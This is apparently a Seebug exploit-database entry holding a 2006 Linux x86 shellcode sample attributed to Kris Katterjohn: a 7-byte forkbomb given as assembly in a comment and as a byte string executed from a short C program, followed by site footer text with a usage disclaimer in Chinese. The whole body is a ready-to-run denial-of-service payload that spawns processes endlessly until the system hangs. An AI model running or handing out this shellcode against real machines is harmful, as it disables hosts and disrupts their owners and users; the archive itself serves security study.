/* By Kris Katterjohn 8/29/2006 * * 7 byte shellcode for a forkbomb * * * * section .text * * global _start * * _start: * push byte 2 * pop eax * int 0x80 * jmp short _start */ main() { char shellcode[] = "\x6a\x02\x58\xcd\x80\xeb\xf9"; (*(void (*)()) shellcode)(); }
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论